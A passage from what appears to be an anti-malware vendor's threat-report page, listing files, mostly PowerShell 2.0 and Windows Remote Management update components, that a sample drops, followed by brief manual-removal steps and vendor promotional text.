    C:\82e7796e90bb69dd8d50b4\about_path_syntax.help.txt (5 bytes)
    C:\82e7796e90bb69dd8d50b4\about_data_sections.help.txt (5 bytes)
    C:\82e7796e90bb69dd8d50b4\about_core_commands.help.txt (221 bytes)
    C:\82e7796e90bb69dd8d50b4\about_debuggers.help.txt (21 bytes)
    C:\82e7796e90bb69dd8d50b4\about_continue.help.txt (1 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\82e7796e90bb69dd8d50b4\about_profiles.help.txt (457 bytes)
    C:\82e7796e90bb69dd8d50b4\about_providers.help.txt (59 bytes)
    C:\82e7796e90bb69dd8d50b4\powershell_ise.resources.dll (4 bytes)
    C:\82e7796e90bb69dd8d50b4\powershell_ise.exe (2526 bytes)
    C:\82e7796e90bb69dd8d50b4\about_prompts.help.txt (7 bytes)
    C:\82e7796e90bb69dd8d50b4\about_try_catch_finally.help.txt (7 bytes)
    C:\82e7796e90bb69dd8d50b4\diagnostics.format.ps1xml (590 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.utility.dll (9684 bytes)
    C:\82e7796e90bb69dd8d50b4\about_remote_faq.help.txt (775 bytes)
    C:\82e7796e90bb69dd8d50b4\bitstransfer.psd1 (950 bytes)
    C:\82e7796e90bb69dd8d50b4\about_return.help.txt (3 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\82e7796e90bb69dd8d50b4\about_line_editing.help.txt (1 bytes)
    C:\82e7796e90bb69dd8d50b4\about_types.ps1xml.help.txt (481 bytes)
    C:\82e7796e90bb69dd8d50b4\about_functions_advanced_methods.help.txt (9 bytes)
    C:\82e7796e90bb69dd8d50b4\about_locations.help.txt (794 bytes)
    C:\82e7796e90bb69dd8d50b4\spuninst.exe (3787 bytes)
    C:\82e7796e90bb69dd8d50b4\default.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\82e7796e90bb69dd8d50b4\winrssrv.dll (12 bytes)
    C:\82e7796e90bb69dd8d50b4\about_wmi_cmdlets.help.txt (8 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.wsman.management.dll (5010 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmanhttpconfig.exe (3009 bytes)
    C:\82e7796e90bb69dd8d50b4\importallmodules.psd1 (438 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\82e7796e90bb69dd8d50b4\about_aliases.help.txt (6 bytes)
    C:\82e7796e90bb69dd8d50b4\powershellcore.format.ps1xml (1492 bytes)
    C:\82e7796e90bb69dd8d50b4\about_job_details.help.txt (824 bytes)
    C:\82e7796e90bb69dd8d50b4\about_language_keywords.help.txt (11 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmauto.dll (1842 bytes)
    C:\82e7796e90bb69dd8d50b4\system.management.automation.dll-help.xml (16567 bytes)
    C:\82e7796e90bb69dd8d50b4\about_type_operators.help.txt (5 bytes)
    C:\82e7796e90bb69dd8d50b4\update\kb968930xp.cat (512 bytes)
    C:\82e7796e90bb69dd8d50b4\about_functions_advanced.help.txt (3 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.editor.dll (14450 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\82e7796e90bb69dd8d50b4\about_do.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\wsman.format.ps1xml (837 bytes)
    C:\82e7796e90bb69dd8d50b4\about_ref.help.txt (1 bytes)
    C:\82e7796e90bb69dd8d50b4\about_throw.help.txt (5 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmplpxy.dll (603 bytes)
    C:\82e7796e90bb69dd8d50b4\about_session_configurations.help.txt (276 bytes)
    C:\82e7796e90bb69dd8d50b4\about_format.ps1xml.help.txt (17 bytes)
    C:\82e7796e90bb69dd8d50b4\about_escape_characters.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\profile.ps1 (772 bytes)
    C:\82e7796e90bb69dd8d50b4\winrs.exe (1154 bytes)
    C:\82e7796e90bb69dd8d50b4\powershelltrace.format.ps1xml (344 bytes)
    C:\82e7796e90bb69dd8d50b4\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\82e7796e90bb69dd8d50b4\pwrshmsg.dll (4 bytes)
    C:\82e7796e90bb69dd8d50b4\certificate.format.ps1xml (155 bytes)
    C:\82e7796e90bb69dd8d50b4\about_assignment_operators.help.txt (379 bytes)
    C:\82e7796e90bb69dd8d50b4\update\spcustom.dll (23 bytes)
    C:\82e7796e90bb69dd8d50b4\about_modules.help.txt (13 bytes)
    C:\82e7796e90bb69dd8d50b4\about_methods.help.txt (6 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmsvc.dll (15909 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\82e7796e90bb69dd8d50b4\pspluginwkr.dll (1756 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmres.dll (6164 bytes)
    C:\82e7796e90bb69dd8d50b4\winrscmd.dll (2907 bytes)
    C:\82e7796e90bb69dd8d50b4\about_signing.help.txt (12 bytes)
    C:\82e7796e90bb69dd8d50b4\pwrshsip.dll (24 bytes)
    C:\82e7796e90bb69dd8d50b4\help.format.ps1xml (3947 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmprovhost.exe (657 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\82e7796e90bb69dd8d50b4\about_bits_cmdlets.help.txt (7 bytes)
    C:\82e7796e90bb69dd8d50b4\about_scopes.help.txt (76 bytes)
    C:\82e7796e90bb69dd8d50b4\about_history.help.txt (3 bytes)
    C:\82e7796e90bb69dd8d50b4\about_operators.help.txt (770 bytes)
    C:\82e7796e90bb69dd8d50b4\about_parsing.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\about_logical_operators.help.txt (2 bytes)
    C:\82e7796e90bb69dd8d50b4\about_break.help.txt (792 bytes)
    C:\82e7796e90bb69dd8d50b4\wsmwmipl.dll (2816 bytes)
    C:\82e7796e90bb69dd8d50b4\spupdsvc.exe (287 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\82e7796e90bb69dd8d50b4\about_script_internationalization.help.txt (9 bytes)
    C:\82e7796e90bb69dd8d50b4\registry.format.ps1xml (20 bytes)
    C:\82e7796e90bb69dd8d50b4\powershell.exe.mui (10 bytes)
    C:\82e7796e90bb69dd8d50b4\about_remote_output.help.txt (887 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.wsman.management.resources.dll (13 bytes)
    C:\82e7796e90bb69dd8d50b4\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\82e7796e90bb69dd8d50b4\windowsremotemanagement.adm (574 bytes)
    C:\82e7796e90bb69dd8d50b4\about_jobs.help.txt (12 bytes)
    C:\82e7796e90bb69dd8d50b4\update\update.ver (14 bytes)
    C:\82e7796e90bb69dd8d50b4\bitstransfer.format.ps1xml (16 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\82e7796e90bb69dd8d50b4\about_comment_based_help.help.txt (595 bytes)
    C:\82e7796e90bb69dd8d50b4\about_eventlogs.help.txt (5 bytes)
    C:\82e7796e90bb69dd8d50b4\getevent.types.ps1xml (15 bytes)
    C:\82e7796e90bb69dd8d50b4\about_transactions.help.txt (1011 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\82e7796e90bb69dd8d50b4\about_properties.help.txt (7 bytes)
    C:\82e7796e90bb69dd8d50b4\pscustomsetuputil.exe (316 bytes)
    C:\82e7796e90bb69dd8d50b4\about_remote_requirements.help.txt (6 bytes)
    C:\82e7796e90bb69dd8d50b4\about_pssnapins.help.txt (6 bytes)
    C:\82e7796e90bb69dd8d50b4\winrm.vbs (2727 bytes)
    C:\82e7796e90bb69dd8d50b4\dotnettypes.format.ps1xml (266 bytes)
    C:\82e7796e90bb69dd8d50b4\about_remote.help.txt (7 bytes)
    C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\82e7796e90bb69dd8d50b4\about_quoting_rules.help.txt (659 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (530 bytes)
    %System%\SETBF.tmp (42 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
    %System%\SET12.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
    %System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
    %System%\SETC.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
    %System%\SET2D.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
    %System%\SET25.tmp (1281 bytes)
    %System%\SET13.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
    %System%\SET20.tmp (2 bytes)
    %System%\SET14.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
    %WinDir%\inf\SET32.tmp (38 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
    %System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
    %System%\SET2A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
    %System%\SET7.tmp (35 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
    %System%\SET22.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
    %System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
    %System%\SET2B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
    %WinDir%\inf\SET18.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
    %System%\SETE.tmp (22 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (7641 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
    %System%\SET6.tmp (2 bytes)
    %System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\wbem\SET4.tmp (4 bytes)
    %System%\SET17.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
    %System%\config\SYSTEM.LOG (5305 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
    %System%\SET27.tmp (601 bytes)
    %System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
    %System%\SET11.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
    %System%\SET8.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
    %System%\SETF.tmp (1281 bytes)
    %System%\SET10.tmp (2 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
    %System%\SET26.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
    %System%\SET21.tmp (35 bytes)
    %System%\config\system (2400 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
    %System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
    %System%\SET16.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
    %System%\CatRoot2\dberr.txt (1579 bytes)
    %WinDir%\inf\oem11.PNF (10040 bytes)
    %System%\SETB.tmp (1281 bytes)
    %System%\SET1F.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
    %System%\SET28.tmp (22 bytes)
    %System%\SET5.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
    %System%\SET31.tmp (673 bytes)
    %System%\SET2E.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
    %System%\SET29.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
    %System%\SET2C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
    %WinDir%\KB968930.log (205168 bytes)
    %System%\SET15.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
    %System%\SET24.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
    %System%\winrm\0409\SET1D.tmp (601 bytes)
    %System%\SETD.tmp (601 bytes)
    %WinDir%\inf\SET19.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
    %System%\SET9.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
    %System%\winrm\0409\SET37.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
    %System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
    %System%\SET2F.tmp (789 bytes)
    %WinDir%\Help\SETC5.tmp (12287 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
    %WinDir%\inf\oem11.inf (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
    %System%\SET30.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
    %System%\wbem\SET1E.tmp (4 bytes)
    %System%\SET23.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
    %WinDir%\inf\SET33.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
    %WinDir%\assembly\tmp\SKPV06BH\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\TNU05CIO\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\PHMSX28D\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %WinDir%\assembly\tmp\7X38EKPU\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\OGLQW17C\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\917CINSY\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\NFKPV05B\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\MEKPV05B\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\PGLRW27D\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\JCHMSX27\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\9Z5AGLRW\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\1SY38DHM\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\POV17CIO\System.Management.Automation.dll (81046 bytes)
    %WinDir%\assembly\tmp\QGLRW27D\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\0RX28DIO\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\ULQW17CI\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\LCINTY49\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (171 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now